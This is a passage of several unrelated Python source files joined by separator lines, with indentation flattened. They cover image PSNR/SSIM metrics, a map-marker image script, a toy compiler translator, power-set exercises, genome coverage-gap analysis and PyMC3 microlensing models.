""" Compute the peak signal to noise ratio (PSNR) for an image.
Parameters
----------
tar_img : sitk
Test image.
ref_img : sitk
Ground-truth image.
Returns
-------
psnr : float
The PSNR metric.
References
----------
.. [1] https://en.wikipedia.org/wiki/Peak_signal-to-noise_ratio
"""
tar_vol = tar_img
ref_vol = ref_img
ref_vol, tar_vol = _as_floats(ref_vol, tar_vol)
err = calc_mse(ref_img, tar_img)
return 10 * np.log10((256 ** 2) / err)
###############################################################
def calc_ssim(tar_img, ref_img, win_size=None, gradient=False, gaussian_weights=False, full=False, **kwargs):
"""Compute the mean structural similarity index between two images.
Parameters
----------
tar_img : sitk
Test image.
ref_img : sitk
Ground-truth image.
win_size : int or None
The side-length of the sliding window used in comparison. Must be an
odd value. If `gaussian_weights` is True, this is ignored and the
window size will depend on `sigma`.
gradient : bool, optional
If True, also return the gradient.
gaussian_weights : bool, optional
If True, each patch has its mean and variance spatially weighted by a
normalized Gaussian kernel of width sigma=1.5.
full : bool, optional
If True, return the full structural similarity image instead of the
mean value.
Other Parameters
----------------
use_sample_covariance : bool
if True, normalize covariances by N-1 rather than, N where N is the
number of pixels within the sliding window.
K1 : float
algorithm parameter, K1 (small constant, see [1]_)
K2 : float
algorithm parameter, K2 (small constant, see [1]_)
sigma : float
sigma for the Gaussian when `gaussian_weights` is True.
Returns
-------
mssim : float
The mean structural similarity over the image.
grad : ndarray
The gradient of the structural similarity index between X and Y [2]_.
This is only returned if `gradient` is set to True.
S : ndarray
The full SSIM image. This is only returned if `full` is set to True.
Notes
-----
To match the implementation of Wang et. al. [1]_, set `gaussian_weights`
to True, `sigma` to 1.5, and `use_sample_covariance` to False.
References
----------
.. [1] Wang, Z., Bovik, A. C., Sheikh, H. R., & Simoncelli, E. P.
(2004). Image quality assessment: From error visibility to
structural similarity. IEEE Transactions on Image Processing,
13, 600-612.
https://ece.uwaterloo.ca/~z70wang/publications/ssim.pdf,
DOI:10.1.1.11.2477
.. [2] Avanaki, A. N. (2009). Exact global histogram specification
optimized for structural similarity. Optical Review, 16, 613-621.
http://arxiv.org/abs/0901.0065,
DOI:10.1007/s10043-009-0119-z
"""
tar_vol = tar_img
ref_vol = ref_img
data_range = 256.0
K1 = kwargs.pop('K1', 0.01)
K2 = kwargs.pop('K2', 0.03)
sigma = kwargs.pop('sigma', 1.5)
if K1 < 0:
raise ValueError("K1 must be positive")
if K2 < 0:
raise ValueError("K2 must be positive")
if sigma < 0:
raise ValueError("sigma must be positive")
use_sample_covariance = kwargs.pop('use_sample_covariance', True)
if win_size is None:
if gaussian_weights:
win_size = 11 # 11 to match Wang et. al. 2004
else:
win_size = 7 # backwards compatibility
if np.any((np.asarray(tar_vol.shape) - win_size) < 0):
raise ValueError(
"win_size exceeds image extent. If the input is a multichannel "
"(color) image, set multichannel=True.")
if not (win_size % 2 == 1):
raise ValueError('Window size must be odd.')
ndim = tar_vol.ndim
if gaussian_weights:
# sigma = 1.5 to approximately match filter in Wang et. al. 2004
# this ends up giving a 13-tap rather than 11-tap Gaussian
filter_func = gaussian_filter
filter_args = {'sigma': sigma}
else:
filter_func = uniform_filter
filter_args = {'size': win_size}
# ndimage filters need floating point data
tar_vol = tar_vol.astype(np.float64)
ref_vol = ref_vol.astype(np.float64)
NP = win_size ** ndim
# filter has already normalized by NP
if use_sample_covariance:
cov_norm = NP / (NP - 1) # sample covariance
else:
cov_norm = 1.0 # population covariance to match Wang et. al. 2004
# compute (weighted) means
ux = filter_func(tar_vol, **filter_args)
uy = filter_func(ref_vol, **filter_args)
# compute (weighted) variances and covariances
uxx = filter_func(tar_vol * tar_vol, **filter_args)
uyy = filter_func(ref_vol * ref_vol, **filter_args)
uxy = filter_func(tar_vol * ref_vol, **filter_args)
vx = cov_norm * (uxx - ux * ux)
vy = cov_norm * (uyy - uy * uy)
vxy = cov_norm * (uxy - ux * uy)
R = data_range
C1 = (K1 * R) ** 2
C2 = (K2 * R) ** 2
A1, A2, B1, B2 = ((2 * ux * uy + C1,
2 * vxy + C2,
ux ** 2 + uy ** 2 + C1,
vx + vy + C2))
D = B1 * B2
S = (A1 * A2) / D
# to avoid edge effects will ignore filter radius strip around edges
pad = (win_size - 1) // 2
# compute (weighted) mean of ssim
mssim = crop(S, pad).mean()
if gradient:
# The following is Eqs. 7-8 of Avanaki 2009.
grad = filter_func(A1 / D, **filter_args) * tar_vol
grad += filter_func(-S / B2, **filter_args) * ref_vol
grad += filter_func((ux * (A2 - A1) - uy * (B2 - B1) * S) / D,
**filter_args)
grad *= (2 / tar_vol.size)
if full:
return mssim, grad, S
else:
return mssim, grad
else:
if full:
return mssim, S
else:
return mssim
###############################################################
###############################################################
if __name__ == "__main__":
ref_img = sitk.ReadImage('recon_gt.nii.gz')
# tar_img = sitk.ReadImage('recon_cnn.nii.gz')
# tar_img = sitk.ReadImage('recon_bspline.nii.gz')
# tar_img = sitk.ReadImage('recon_linear.nii.gz')
tar_img = sitk.ReadImage('recon_downsampled.nii.gz')
# crop
ref_img = sitk.RegionOfInterest(ref_img, size=[ref_img.GetSize()[0] - 20, ref_img.GetSize()[1] - 20,
ref_img.GetSize()[2] - 20], index=[10, 10, 10])
tar_img = sitk.RegionOfInterest(tar_img, size=[tar_img.GetSize()[0] - 20, tar_img.GetSize()[1] - 20,
tar_img.GetSize()[2] - 20], index=[10, 10, 10])
# resample to reference image
tar_img = resample(tar_img=tar_img, ref_img=ref_img)
# register
# tar_img = register(moving_image=tar_img, fixed_image=ref_img)
# calculate psnr
print(calc_psnr(tar_img=tar_img, ref_img=ref_img))
# calculate cross-coreelation
print(calc_correlation(tar_img=tar_img, ref_img=ref_img))
# calculate ssim
ssim, ssim_vol = calc_ssim(tar_img=tar_img, ref_img=ref_img, full=True)
dssim_vol = (1 - ssim_vol) / 2.
print(ssim)
dssim_img = sitk.GetImageFromArray(dssim_vol)
dssim_img.CopyInformation(tar_img)
sitk.WriteImage(dssim_img, 'dssim.nii.gz')
|
#import cv2
import argparse
class CommandLineInterface:
"""This class is for interpretting the arguments passed through
the command line and selecting what the program should do"""
def __init__(self):
# set up argument parser
self.parser = argparse.ArgumentParser()
self.parser.add_argument("--grayscale", help="flag for converting the file specified to grayscale", action="store_true")
self.parser.add_argument("filename",help="the path to a file", type=file)
def parseCommand(self):
args = self.parser.parse_args()
if(args.grayscale):
pass
cli = CommandLineInterface()
cli.parseCommand()
#parser = argparse.ArgumentParser()
#parser.add_argument("-s","--square", help="display a square of a given number", type=int)
#args = parser.parse_args()
#print args.square**2
|
# coding: utf8
import sys, os
import math
from PIL import Image
"""
与えられた画像をgmapのmarker用に整形する
読み込み画像は正方形であると仮定
"""
if not len(sys.argv) == 3:
print("invalid argument!")
sys.exit()
# 読み込み
logo_img = Image.open(sys.argv[1], 'r')
if logo_img.mode != "RGBA":
logo_img = logo_img.convert("RGBA") # RGBモードに変換する
shop_id = sys.argv[2]
#basename = sys.argv[1].split("/")[-1].split(".")[0]
width = logo_img.size[0]
height = logo_img.size[1]
# 32x32にリサイズ
if width != 32:
logo_img.thumbnail((32, 32), Image.ANTIALIAS)
# 画素値をロードしてロゴの代表色をピック
data = logo_img.load()
logo_color = data[3,3]
# ピン用の下三角画像を読み込み
root_dir = os.environ["PROJECT_HOME"]
pin_img_path = root_dir + "/lib/assets/pin.png"
pin_img = Image.open(pin_img_path)
data = pin_img.load()
for x in range(0, pin_img.size[0]):
for y in range(0, pin_img.size[1]):
if data[x, y] != (0,0,0,0):
pixel = list(data[x,y])
pixel[:3] = logo_color[:3]
data[x, y] = tuple(pixel)
# ロゴとピン画像をバーティカルジョインする
marker_pin_img = Image.new("RGBA", (32, 44), (0, 0, 0, 0))
marker_pin_img.paste(logo_img, (0, 0))
marker_pin_img.paste(pin_img, (8, 32))
# 保存
marker_pin_img.save("{}/app/assets/images/{}.png".format(root_dir, shop_id), 'PNG', quality=100, optimize=True)
|
from __future__ import print_function
import intermediate as ir
from util import MultiplePosInfo
Ref = ir.Ref
class ThreeError(Exception): pass
class DataType(str): pass
dt_num = DataType("int")
dt_bool = DataType("bool")
class RAMValue:
__slots__ = ["addr"]
def __init__(self, addr):
assert isinstance(addr, Ref)
self.addr = addr
def load(self, cc):
return cc.add_instr(ir.load, self.addr)
def store(self, cc, value):
return cc.add_instr(ir.store, self.addr, value)
class RegValue:
__slots__ = ["value"]
def __init__(self, value):
self.value = value
def load(self, cc):
return self.value
def store(self, cc, value):
self.value = value
return value
class Scope:
def __init__(self):
self.structs = {}
self.fields = {}
self.variables = {}
self.structs_prev_decl = {}
self.fields_prev_decl = {}
self.variables_prev_decl = {}
def check_redecl(self, prev_decl, name, posinfo, msg_extend=lambda: "", extra_frames=[]):
if name in prev_decl:
prevdecl_info = MultiplePosInfo([
("Previous declaration", prev_decl[name]),
("Redeclaration", posinfo)
]+extra_frames)
raise ThreeError(prevdecl_info)
prev_decl[name] = posinfo
def add_struct(self, struct):
self.check_redecl (self.structs_prev_decl, struct.name, struct.posinfo)
self.structs[struct.name] = struct
for i, (fname, posinfo) in enumerate(struct.fieldnames):
self.check_redecl (self.fields_prev_decl, fname, posinfo, lambda: "in "+self.fields[fname][0])
self.fields[fname] = (struct.name, i)
def add_var(self, varname, value, posinfo=None, posinfo_ext=[]):
self.check_redecl (self.variables_prev_decl, varname, posinfo, extra_frames=posinfo_ext)
self.variables[varname] = value
def copy(self):
s = Scope()
s.structs = self.structs.copy()
s.fields = self.fields.copy()
s.variables = self.variables.copy()
s.structs_prev_decl = self.structs_prev_decl.copy()
s.fields_prev_decl = self.fields_prev_decl.copy()
s.variables_prev_decl = self.variables_prev_decl.copy()
return s
def translate(program):
scope = Scope()
print("\t.text")
for decl in program:
if isinstance(decl, Struct):
scope.add_struct(decl)
for decl in program:
if isinstance(decl, Func):
funcscope = scope.copy()
cc = ir.CodeCollect()
arg_ils = [cc.add_instr(ir.rarg, i) for i in range(len(decl.argnames))]
for arg_il, (argname, posinfo) in zip(arg_ils, decl.argnames):
arg_copy_il = cc.add_instr(ir.copy, arg_il)
funcscope.add_var(argname, RegValue(arg_copy_il), posinfo)
translate_stmts(cc, funcscope, decl.body)
Return(Num(0)).translate(cc, funcscope)
if ir.intermlog:
print("\t.globl\t{0}".format(decl.name))
print("\t.type\t{0}, @function".format(decl.name))
print(decl.name+":")
cc.drop_unused_ops()
#cc.print_()
import translate, isel_hardcoded
translate.translate(cc, isel_hardcoded)
#print("# end")
print("\t.size\t{0}, .-{0}".format(decl.name))
#print ("func {}(?)".format(decl.name), cc.instructions)
#print(decl)
#print(fieldnames)
def translate_stmts(cc, scope, stmts):
for stmt in stmts:
stmt.translate(cc, scope)
class UnaryOp:
def __init__(self, op, rhs, posinfo):
self.op = op
self.rhs = rhs
def __repr__(self):
return "UnaryOp {0} {1}".format(self.op, self.rhs)
def translate(self, cc, scope):
return cc.add_instr(self.op, self.rhs.translate(cc, scope))
class BinOp:
def __init__(self, lhs, op, rhs):
self.lhs = lhs
self.op = op
self.rhs = rhs
self.datatype = dt_num
def __repr__(self):
return "BinOp {0} {1} {2}".format(self.lhs, self.op, self.rhs)
def translate(self, cc, scope):
l = self.lhs.translate(cc, scope)
r = self.rhs.translate(cc, scope)
return cc.add_instr(self.op, l, r)
class BoolOp:
def __init__(self, lhs, op, rhs):
self.lhs = lhs
self.op = op
self.rhs = rhs
self.datatype = dt_bool
def __repr__(self):
return "BoolOp {0} {1} {2}".format(self.lhs, self.op, self.rhs)
def translate(self, cc, scope):
l = self.lhs.translate(cc, scope)
r = self.rhs.translate(cc, scope)
return cc.add_instr(self.op, l, r)
class Func:
def __init__(self, name, argnames, stmts):
self.name = name
self.argnames = tuple(argnames)
self.body = stmts
def __repr__(self):
return "Func {0} {1} {{{2}}}".format(self.name, self.argnames, self.body)
class Struct:
def __init__(self, name, fieldnames, posinfo=None):
self.name = name
self.fieldnames = tuple(fieldnames)
self.posinfo = posinfo
def __repr__(self):
return "Struct {0} {1}".format(self.name, self.fieldnames)
class Return:
def __init__(self, value):
self.value = value
def __repr__(self):
return "Return({0})".format(self.value)
def translate(self, cc, scope):
the_copy = cc.add_instr(ir.copy, self.value.translate(cc, scope))
cc.add_instr(ir.ret, the_copy)
class Cond:
def __init__(self, cases):
self.cases = cases
def __repr__(self):
return "Cond{0}".format(self.cases)
def translate(self, cc, scope):
end_label = ir.Label()
labels = []
zero = cc.add_const(0)
for condition, body in self.cases:
cond_il = condition.translate(cc, scope)
label = ir.Label()
iil = cc.add_instr(ir.gt, zero, cond_il)
cc.add_instr(ir.jump, label, iil)
labels.append(label)
cc.add_instr(ir.jump, end_label)
for i, (condition, body) in enumerate(self.cases):
label = labels[i]
label.target = ".t{0}".format(len(cc.instructions))
cc.add_instr("nop", label)
translate_stmts(cc, scope, body)
is_last = (i == len(self.cases)-1)
if not is_last:
cc.add_instr(ir.jump, end_label)
end_label.target = ".t{0}".format(len(cc.instructions))
cc.add_instr("nop", end_label)
class Num:
def __init__(self, num):
self.num = num
self.datatype = dt_num
def __repr__(self):
return "#"+str(self.num)
def translate(self, cc, scope):
return cc.add_const(self.num)
class Call:
def __init__(self, funcname, args):
self.funcname = funcname
self.args = tuple(args)
def __repr__(self):
return "{0}!{1}".format(self.funcname, self.args)
def translate(self, cc, scope):
arg_ils = [arg.translate(cc, scope) for arg in self.args]
copy_ils = [cc.add_instr(ir.copy, arg_il) for arg_il in arg_ils]
retval_ir = cc.add_instr(ir.call, self.funcname, *copy_ils)
return cc.add_instr(ir.copy, retval_ir)
class Access:
write = None
datatype = dt_num
def write_repr(self):
if self.write is not None:
return " = {0}".format(self.write)
return ""
def modwrite(self, value):
self.write = value
return self
class VarAccess(Access):
def __init__(self, name, posinfo=None):
self.name = name
self.posinfo = posinfo
def __repr__(self):
return self.name+self.write_repr()
def translate(self, cc, scope):
if self.name not in scope.variables:
message = "No variable '{0}' in this context.".format(self.name)
raise ThreeError(MultiplePosInfo([(message, self.posinfo)]))
if self.write:
store_value = self.write.translate(cc, scope)
scope.variables[self.name].store(cc, store_value)
return store_value
else:
return scope.variables[self.name].load(cc)
class FieldAccess(Access):
def __init__(self, base, name, posinfo=None):
self.base = base
self.name = name
self.posinfo = posinfo
def __repr__(self):
return "{0}.{1}".format(self.base, self.name)+self.write_repr()
def translate(self, cc, scope):
if self.name not in scope.fields:
message = "No field '{0}' in this context.".format(self.name)
raise ThreeError(MultiplePosInfo([(message, self.posinfo)]))
origin_struct, offset = scope.fields[self.name]
basil = self.base.translate(cc, scope)
addr = cc.add_instr(ir.add, basil, cc.add_const(offset*8))
if self.write:
newval = self.write.translate(cc, scope)
cc.add_instr(ir.store, addr, newval)
return newval
else:
return cc.add_instr(ir.load, addr)
class Let:
def __init__(self, lets, stmts):
self.lets = lets
self.body = stmts
def __repr__(self):
return "Let{0} {{{1}}}".format(self.lets, self.body)
def translate(self, cc, scope):
inner_scope = scope.copy()
for varname, value, varname_posinfo in self.lets:
vt = RegValue(value.translate(cc, scope))
inner_scope.add_var(varname, vt, varname_posinfo)
for stmt in self.body:
stmt.translate(cc, inner_scope)
class With:
def __init__(self, base, structname, stmts, posinfo):
self.base = base
self.structname = structname
self.body = stmts
self.posinfo = posinfo
def __repr__(self):
return "with {0}:{1} {{{2}}}".format(self.base, self.structname, self.body)
def translate(self, cc, scope):
scope = scope.copy()
if self.structname not in scope.structs:
message = "'with' referencing the unknown struct {0!r}".format(self.structname)
raise ThreeError(MultiplePosInfo([(message, self.posinfo)]))
basil = self.base.translate(cc, scope)
struct = scope.structs[self.structname]
for i, (fieldname, field_posinfo) in enumerate(struct.fieldnames):
offset = i * 8
addr = cc.add_instr(ir.add, basil, cc.add_const(offset))
scope.add_var(fieldname, RAMValue(addr), self.posinfo, [("Originates from", field_posinfo)])
for stmt in self.body:
stmt.translate(cc, scope)
|
'''
Power Set: Write a method to return all subsets of a set.
'''
import copy
def getPowerSet(set):
if set is None:
return None
return getPowerSetHelper(set)
def getPowerSetHelper(set):
if len(set) == 0:
return [[]]
subset = getPowerSetHelper(set[1:])
moreSubset = copy.deepcopy(subset)
for list in moreSubset:
list.append(set[0])
return subset + moreSubset
def getPowerSetTemplate(set):
if set is None:
return None
getPowerSetTemplateHelper([], set, 0)
return
def getPowerSetTemplateHelper(path, set, pos):
print(path)
for index in range(pos, len(set)):
path.append(set[index])
getPowerSetTemplateHelper(path, set, index+1)
path.pop(len(path)-1)
return
def getUniquePowerSet(set):
if set is None:
return None
getUniquePowerSetHelper([], set, 0)
return
def getUniquePowerSetHelper(path, set, pos):
print(path)
for index in range(pos, len(set)):
if (index > 0) and (set[index -1] == set[index]):
continue
path.append(set[index])
getUniquePowerSetHelper(path, set, index+1)
path.pop(len(path)-1)
return
if __name__ == '__main__':
set = [3,2]
#my method
print(getPowerSet(set))
#template method
print()
getPowerSetTemplate(set)
#unique power set template
print()
set = [1,1,2,2]
getUniquePowerSet(set)
|
import os
import glob
import numpy as np
import collections
import subprocess
import sys
from Bio.Blast.Applications import NcbiblastnCommandline
import matplotlib as mpl
# mpl.use('Agg')
import matplotlib.pyplot as plt
import stat
import math
import logging
logging.basicConfig(format='[%(asctime)s][%(funcName)s][%(levelname)s] - %(message)s', level=logging.DEBUG)
logger = logging.getLogger(__name__)
class gap(object):
def __init__(
self,
minCoverage,
maxCoverage,
genome,
):
self.minCoverage = minCoverage
self.maxCoverage = maxCoverage
self.genome = genome
self.maxRefLen = 0
self.referenceGenome = ''
self.coverageArray = np.zeros(self.maxRefLen)
self.gapDic = {}
self.baseContent = collections.defaultdict(int)
self.genomeSeq = ''
self.kmerCounter = collections.defaultdict(int)
def findRefGenome(
self,
samfile
):
self.maxRefLen = max([x['LN'] for x in samfile.header['SQ']])
for x in samfile.header['SQ']:
if x['LN'] == self.maxRefLen:
self.referenceGenome = x['SN']
def fillCoverageArray(
self,
samfile):
self.coverageArray = np.zeros(self.maxRefLen)
for base in samfile.pileup(self.referenceGenome):
self.coverageArray[base.pos] = base.n
def findGaps(self):
gapFlag = False
tempRange = []
gapStartTracker = 0
while gapStartTracker < self.maxRefLen:
if (gapStartTracker%1000000 == 0) and gapStartTracker != 0:
logging.debug('%d bases processed' % gapStartTracker)
if self.coverageArray[gapStartTracker] >= self.minCoverage and self.coverageArray[gapStartTracker] <= self.maxCoverage:
gapFlag = True
tempRange.append(gapStartTracker)
else:
if tempRange:
self.gapDic[tempRange[0]] = tempRange[-1]
tempRange = []
gapFlag = False
gapStartTracker += 1
def countBaseContent(
self,
sequence
):
for base in sequence:
self.baseContent[base.upper()] += 1
def countKmers(
self,
sequence,
kmer = 9 #chage at some point....
):
if len(sequence) >= kmer:
self.kmerCounter[sequence[:kmer]] += 1
def readGenome(self):
g = ''
with open(self.genome, 'r') as fobj:
fobj.next()
sequence = []
for line in fobj:
sequence.append(line.strip())
g = "".join(sequence)
self.genomeSeq = g
def countBaseContent(
self,
sequence
):
for base in sequence:
self.baseContent[base.upper()] += 1
def writeGaps(self, gapfilename):
with open(gapfilename, 'w') as fout:
fout.write(',START,STOP,LENGTH,SEQUENCE,POSITIONAL COVERAGE\n')
counter = 1
self.readGenome()
for start, stop in self.gapDic.items():
tList = []
x = start
while x <= stop:
tList.append(self.coverageArray[x])
print self.coverageArray[x]
x+=1
tList = ','.join(str(e) for e in tList)
sequence = self.genomeSeq[start:stop+1]
fout.write('%i,%i,%i,%i,%s,%s' %(counter, start, stop, stop+1-start, sequence, tList))
fout.write('\n')
counter += 1
tList = []
def plotLocSize(
self,
gaphistogram,
filename,
sampleFolder,
logY
):
gapLocation = []
gapSize = []
for start, stop in self.gapDic.items():
gapLocation.append(start)
gapSize.append(stop + 1 - start)
fig = plt.figure()
if logY:
logYvalues = np.log(gapSize)
plt.bar(
gapLocation,
logYvalues,
0.1,
color='#0099cc',
edgecolor='#0099cc'
)
else:
plt.bar(
gapLocation,
gapSize,
0.1,
color='#0099cc',
edgecolor='#0099cc'
)
plt.xlim([-100000,self.maxRefLen+100000])
plt.xlabel('Gap location in genome')
plt.ylabel('Length of gap')
plt.title('%s: gaps within coverages %i-%iX' %(filename, self.minCoverage, self.maxCoverage), fontsize=12, )
plt.savefig(gaphistogram, format='PDF')
def writestats(self, outputFile, filename):
with open(outputFile, 'a') as fout:
lenInfo = []
for start, stop in self.gapDic.items():
sequence = self.genomeSeq[start:stop+1]
self.countBaseContent(sequence)
lenInfo.append(int(len(sequence)))
totalBases = int(self.baseContent['A'] + self.baseContent['T'] + self.baseContent['G'] + self.baseContent['C'])
(self.baseContent['A'] + self.baseContent['T']) * 100. / totalBases
fout.write('\n')
fout.write('%s,%.2f,%.2f,%.2f,%i,%.2f,%.3f,%i' %(
filename,
(sum(lenInfo)*1.0/self.maxRefLen)*100.0,
(self.baseContent['A'] + self.baseContent['T']) * 100. / totalBases,
(self.baseContent['G'] + self.baseContent['C']) * 100. / totalBases,
len(lenInfo),
sum(lenInfo)*1.0/len(lenInfo),
np.std(lenInfo, dtype=np.float64),
max(lenInfo)
))
def reset(self):
self.maxRefLen = 0
self.referenceGenome = ''
self.coverageArray = np.zeros(self.maxRefLen)
self.gapDic = {}
self.baseContent = collections.defaultdict(int)
self.genomeSeq = ''
self.kmerCounter = collections.defaultdict(int)
|
def mult_x_add_y(number, x, y):
print(number*x + y)
mult_x_add_y(5, 2, 3)
# 13
|
import sys
import numpy as np
import pymc3 as pm
import theano.tensor as T
import caustic as ca
sys.path.append("../")
from utils import find_alert_time
class DefaultModel(ca.models.SingleLensModel):
"""
Default model.
"""
def __init__(self, data):
super(DefaultModel, self).__init__(data, standardize=False)
# Compute alert time
alert_time = find_alert_time(data)
n_bands = len(data.light_curves)
BoundedNormal = pm.Bound(pm.Normal, lower=0.0)
BoundedNormal_1 = pm.Bound(pm.Normal, lower=1.0)
# Initialize linear parameters
f = pm.Uniform("f", 0.0, 1.0, testval=0.9)
m_b = pm.Normal("m_b", mu=15.0, sd=10.0, testval=15.0)
F_base = 10 ** (-(m_b - 22.0) / 2.5)
# Initialize non-linear parameters
## Posterior is multi-modal in t0 and it's critical that the it is
## initialized near the true value
ln_t0_testval = T.log(ca.utils.estimate_t0(data) - alert_time)
ln_delta_t0 = pm.Normal("ln_delta_t0", 4.0, 5.0, testval=ln_t0_testval)
delta_t_0 = T.exp(ln_delta_t0)
ln_A0 = pm.Exponential("ln_A0", 0.1, testval=np.log(3.0))
ln_tE = pm.Normal("ln_tE", mu=4.0, sd=5.0, testval=3.0)
# Deterministic transformations
tE = pm.Deterministic("tE", T.exp(ln_tE))
u0 = pm.Deterministic(
"u0", T.sqrt(2 * T.exp(ln_A0) / T.sqrt(T.exp(ln_A0) ** 2 - 1) - 2)
)
# Compute the trajectory of the lens
trajectory = ca.trajectory.Trajectory(data, alert_time + delta_t_0, u0, tE)
u = trajectory.compute_trajectory(self.t)
# Compute the magnification
mag = (u ** 2 + 2) / (u * T.sqrt(u ** 2 + 4))
# Compute the mean model
mean = f * F_base * mag + (1 - f) * F_base
# We allow for rescaling of the error bars by a constant factor
c = BoundedNormal_1(
"c",
mu=T.ones(n_bands),
sd=2.0 * T.ones(n_bands),
testval=1.5 * T.ones(n_bands),
shape=(n_bands),
)
# Diagonal terms of the covariance matrix
var_F = (c * self.sig_F) ** 2
# Compute the Gaussian log_likelihood, add it as a potential term to the model
ll = self.compute_log_likelihood(self.F - mean, var_F)
pm.Potential("log_likelihood", ll)
# Save logp-s for each variable
pm.Deterministic("logp_f", f.distribution.logp(f))
pm.Deterministic("logp_ln_delta_t0", ln_delta_t0.distribution.logp(ln_delta_t0))
pm.Deterministic("logp_ln_A0", ln_A0.distribution.logp(ln_A0))
pm.Deterministic("logp_ln_tE", ln_tE.distribution.logp(ln_tE))
class DefaultModelUniformPriors(ca.models.SingleLensModel):
"""
This is just for the purpose of computing the maximum likelihood solution.
"""
def __init__(self, data):
super(DefaultModelUniformPriors, self).__init__(data, standardize=False)
# Compute alert time
alert_time = find_alert_time(data)
n_bands = len(data.light_curves)
BoundedNormal = pm.Bound(pm.Normal, lower=0.0)
BoundedNormal_1 = pm.Bound(pm.Normal, lower=1.0)
# Initialize linear parameters
f = pm.Uniform("f", 0.0001, 0.999, testval=0.9)
m_b = pm.Uniform("m_b", 8.0, 25.0, testval=15.0)
F_base = 10 ** (-(m_b - 22.0) / 2.5)
# Initialize non-linear parameters
## Posterior is multi-modal in t0 and it's critical that the it is
## initialized near the true value
t0_testval = T.log(ca.utils.estimate_t0(data) - alert_time)
ln_delta_t0 = pm.Uniform("ln_delta_t0", -1.0, 10.0, testval=t0_testval)
delta_t_0 = T.exp(ln_delta_t0)
ln_A0 = pm.Uniform("ln_A0", 0.1, 100, testval=np.log(3.0))
ln_tE = pm.Uniform("ln_tE", -1.0, 10, testval=3.0)
# Deterministic transformations
tE = pm.Deterministic("tE", T.exp(ln_tE))
u0 = pm.Deterministic(
"u0", T.sqrt(2 * T.exp(ln_A0) / T.sqrt(T.exp(ln_A0) ** 2 - 1) - 2)
)
# Compute the trajectory of the lens
trajectory = ca.trajectory.Trajectory(data, alert_time + delta_t_0, u0, tE)
u = trajectory.compute_trajectory(self.t)
# Compute the magnification
mag = (u ** 2 + 2) / (u * T.sqrt(u ** 2 + 4))
# Compute the mean model
mean = f * F_base * mag + (1 - f) * F_base
# We allow for rescaling of the error bars by a constant factor
c = BoundedNormal_1(
"c",
mu=T.ones(n_bands),
sd=5.0 * T.ones(n_bands),
testval=1.5 * T.ones(n_bands),
shape=(n_bands),
)
# Diagonal terms of the covariance matrix
var_F = (c * self.sig_F) ** 2
# Compute the Gaussian log_likelihood, add it as a potential term to the model
ll = self.compute_log_likelihood(self.F - mean, var_F)
pm.Potential("log_likelihood", ll)
class HierarchicalModel(pm.Model):
"""
Hierchical model using the importance resampling trick.
"""
def __init__(self, samples_tensor, samples_logp_tensor):
super(HierarchicalModel, self).__init__()
# This will take a while, loading the massive arrays into memory is costly
BoundedNormal = pm.Bound(pm.Normal, lower=0.0)
# Parameters of the prior for blend fraction f
alpha_f = BoundedNormal("alpha_f", 0, 10.0, testval=5.0)
beta_f = BoundedNormal("beta_f", 0, 10.0, testval=1.0)
# Parameters of the prior for delta_t0
mu_ln_delta_t0 = pm.Normal("mu_ln_delta_t0", 4, 5.0, testval=3.0)
sig_ln_delta_t0 = BoundedNormal("sig_ln_delta_t0", 1.0, 5.0, testval=1.0)
# Parameters of the prior for ln_A0
lam_ln_A0 = BoundedNormal("lam_ln_A0", 0.0, 1.0, testval=0.1)
# Parameters of the prior for ln_tE
mu_ln_tE = pm.Normal("mu_ln_tE", 3.0, 10.0, testval=3.0)
sig_ln_tE = BoundedNormal("sig_ln_tE", 1.0, 20.0, testval=1.0)
def compute_ll():
n_bands = T.shape(samples_tensor).eval()[0]
result = 0.0
# Iterate over members of the population
for i in range(n_bands):
# Compute new prior
# ln_A0
log_new_prior = pm.Exponential.dist(lam_ln_A0).logp(
samples_tensor[i, :, 0]
)
# delta_t0
log_new_prior += pm.Normal.dist(
mu=mu_ln_delta_t0, sd=sig_ln_delta_t0
).logp(samples_tensor[i, :, 1])
# ln_tE
log_new_prior += pm.Normal.dist(mu=mu_ln_tE, sd=sig_ln_tE).logp(
samples_tensor[i, :, 2]
)
# f
log_new_prior += pm.Beta.dist(alpha_f, beta_f).logp(
samples_tensor[i, :, 3]
)
# Compute old prior
log_old_prior = T.sum(samples_logp_tensor[i], axis=1)
# Compute importance resampling fraction
log_frac = log_new_prior - log_old_prior
result += T.log(T.sum(T.exp(log_frac)) / T.shape(samples_tensor)[1])
return result
pm.Potential("log_likelihood", compute_ll())
class PredictiveModelEmpiricalPriors(ca.models.SingleLensModel):
"""
Model optimized for prediction of ongoing events, based on Albrow (2004).
"""
def __init__(
self,
data,
lam_ln_A0=0.62569998,
mu_ln_delta_t0=3.14397,
sig_ln_delta_t0=1.198987,
mu_ln_tE=3.746819,
sig_ln_tE=1.26364,
):
super(PredictiveModelEmpiricalPriors, self).__init__(data, standardize=False)
# Compute alert time
alert_time = find_alert_time(data)
# Compute empirically determined parameters of prior distributions
n_bands = len(data.light_curves)
BoundedNormal = pm.Bound(pm.Normal, lower=0.0)
BoundedNormal_1 = pm.Bound(pm.Normal, lower=1.0)
# Initialize linear parameters
f = pm.Uniform("f", 0.0, 1.0, testval=0.5)
m_b = pm.Normal("m_b", mu=15.0, sd=10.0, testval=15.0)
F_base = 10 ** (-(m_b - 22.0) / 2.5)
# Initialize non-linear parameters
ln_delta_t0 = pm.Normal("ln_delta_t0", 3.14397, 1.198987, testval=3.0)
delta_t_0 = T.exp(ln_delta_t0)
ln_A0 = pm.Exponential("ln_A0", 0.62569998, testval=2.0)
ln_tE = pm.Normal("ln_tE", mu=3.746819, sd=1.26364, testval=3.0)
# Deterministic transformations
tE = pm.Deterministic("tE", T.exp(ln_tE))
u0 = pm.Deterministic(
"u0", T.sqrt(2 * T.exp(ln_A0) / T.sqrt(T.exp(ln_A0) ** 2 - 1) - 2)
)
# Compute the trajectory of the lens
trajectory = ca.trajectory.Trajectory(data, alert_time + delta_t_0, u0, tE)
u = trajectory.compute_trajectory(self.t)
# Compute the magnification
mag = (u ** 2 + 2) / (u * T.sqrt(u ** 2 + 4))
# Compute the mean model
mean = f * F_base * mag + (1 - f) * F_base
# We allow for rescaling of the error bars by a constant factor
c = BoundedNormal_1(
"c",
mu=T.ones(n_bands),
sd=2.0 * T.ones(n_bands),
testval=1.5 * T.ones(n_bands),
shape=(n_bands),
)
# Diagonal terms of the covariance matrix
var_F = (c * self.sig_F) ** 2
# Compute the Gaussian log_likelihood, add it as a potential term to the model
ll = self.compute_log_likelihood(self.F - mean, var_F)
pm.Potential("log_likelihood", ll)
class PredictiveModel(ca.models.SingleLensModel):
"""
Hierarchical predictive model. Uses posterior samples over the
